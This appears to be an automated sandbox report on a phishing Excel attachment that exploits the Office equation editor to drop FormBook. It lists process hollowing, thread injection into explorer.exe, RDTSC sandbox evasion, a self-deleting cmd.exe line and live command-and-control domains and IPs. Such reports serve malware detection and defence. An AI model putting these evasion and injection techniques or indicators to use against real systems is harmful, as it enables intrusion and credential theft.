          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxStream path 'EncryptedPackage' entropy: 7.99982695424 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3032Thread sleep time: -240000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3032Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 2248Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000006.00000000.2168055639.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2154423611.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2141137463.0000000000544000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.2145052068.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B30 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007900EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00790080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007B26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F926F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.spinecompanion.com
          Source: C:\Windows\explorer.exeDomain query: www.reufhroir.com
          Source: C:\Windows\explorer.exeDomain query: www.pholbhf.icu
          Source: C:\Windows\explorer.exeDomain query: www.dr-farshidtajik.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.70.184.50 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: B40000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000000.2145193099.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2145193099.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2168055639.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2145193099.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information31LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433035 Sample: Agency Appointment VSL Tbn-... Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 42 www.doodstore.net 2->42 44 doodstore.net 2->44 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 11 other signatures 2->60 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 38 33 2->16         started        signatures3 process4 dnsIp5 52 192.210.173.40, 49167, 80 AS-COLOCROSSINGUS United States 11->52 36 C:\Users\user\AppData\...\loader1[1].exe, PE32 11->36 dropped 38 C:\Users\Public\vbc.exe, PE32 11->38 dropped 80 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->80 18 vbc.exe 20 11->18         started        40 ~$Agency Appointme...etter- 2100133.xlsx, data 16->40 dropped file6 signatures7 process8 file9 34 C:\Users\user\AppData\Local\...\System.dll, PE32 18->34 dropped 62 Multi AV Scanner detection for dropped file 18->62 64 Detected unpacking (changes PE section rights) 18->64 66 Machine Learning detection for dropped file 18->66 68 2 other signatures 18->68 22 vbc.exe 18->22         started        signatures10 process11 signatures12 70 Modifies the context of a thread in another process (thread injection) 22->70 72 Maps a DLL or memory area into another process 22->72 74 Sample uses process hollowing technique 22->74 76 Queues an APC in another process (thread injection) 22->76 25 explorer.exe 22->25 injected process13 dnsIp14 46 192.168.2.22, 49167, 49168, 49169 unknown unknown 25->46 48 www.spinecompanion.com 25->48 50 5 other IPs or domains 25->50 78 System process connects to network (likely due to code injection or exploit) 25->78 29 raserver.exe 25->29         started        signatures15 process16 signatures17 82 Modifies the context of a thread in another process (thread injection) 29->82 84 Maps a DLL or memory area into another process 29->84 86 Tries to detect virtualization through RDTSC time measurements 29->86 32 cmd.exe 29->32         started        process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx25%VirustotalBrowse
          Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx22%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe28%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsoA180.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsoA180.tmp\System.dll0%ReversingLabs
          C:\Users\Public\vbc.exe28%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          5.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          4.2.vbc.exe.9760000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          7.2.raserver.exe.2477960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.2.raserver.exe.739160.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          webredir.vip.gandi.net
          		217.70.184.50
          		truefalse
            		high
            doodstore.net
            		67.199.248.12
            		truetrue
              		unknown
              www.spinecompanion.com
              		unknown
              		unknowntrue
                		unknown
                www.dr-farshidtajik.com
                		unknown
                		unknowntrue
                  		unknown
                  www.reufhroir.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.pholbhf.icu
                    		unknown
                    		unknowntrue
                      		unknown
                      www.doodstore.net
                      		unknown
                      		unknowntrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://search.ebay.de/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.mtv.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://www.rambler.ru/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://buscar.ya.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://asp.usatoday.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://rover.ebay.comexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://search.ebay.in/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://msk.afisha.ru/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://search.rediff.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2151585169.0000000003C40000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://search.naver.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://www.google.ru/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://search.daum.net/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
